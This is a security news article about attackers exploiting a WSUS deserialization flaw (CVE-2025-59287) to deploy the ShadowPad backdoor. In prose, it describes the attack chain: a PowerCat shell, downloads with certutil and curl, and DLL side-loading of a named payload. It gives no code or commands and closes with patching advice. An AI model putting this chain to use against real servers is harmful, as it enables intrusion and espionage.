ShadowPad Malware Exploits WSUS Vulnerability for Full System Access
A critical security flaw in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, has been actively exploited by cyber attackers to deploy the ShadowPad malware, granting them full system access. This vulnerability, a deserialization flaw, allows remote code execution with system-level privileges, posing a significant threat to organizations utilizing WSUS for system updates.
The exploitation process begins with attackers targeting Windows Servers that have WSUS enabled. By leveraging CVE-2025-59287, they gain initial access to the system. Subsequently, they utilize PowerCat, an open-source PowerShell-based Netcat utility, to establish a command shell (CMD). This access enables them to download and install ShadowPad using Windows utilities such as ‘certutil’ and ‘curl’.
ShadowPad, considered the successor to the PlugX malware, is a modular backdoor extensively used by Chinese state-sponsored hacking groups since its emergence in 2015. Its design allows for dynamic loading of additional plugins from a remote server, facilitating the harvesting of sensitive data from compromised networks.
In the documented attack, the adversaries exploited the WSUS vulnerability to execute Windows utilities like ‘curl.exe’ and ‘certutil.exe’. These tools contacted an external server to download and install ShadowPad. The malware employs DLL side-loading techniques, using a legitimate binary (‘ETDCtrlHelper.exe’) to execute a malicious DLL payload (‘ETDApix.dll’). This payload acts as a memory-resident loader, initiating the backdoor’s operations.
Once installed, ShadowPad launches its core module responsible for loading other embedded plugins into memory. It incorporates various anti-detection and persistence mechanisms to maintain its foothold within the system. Notably, this activity has not been attributed to any specific threat actor or group.
The rapid weaponization of the publicly released proof-of-concept (PoC) exploit code for CVE-2025-59287 underscores the critical nature of this vulnerability. Its exploitation allows remote code execution with system-level permissions, significantly amplifying the potential impact on affected systems.
Given the severity of this threat, it is imperative for organizations to promptly apply the security patches provided by Microsoft to mitigate the risk associated with CVE-2025-59287. Additionally, implementing robust monitoring and detection strategies can help identify and respond to such exploitation attempts effectively.
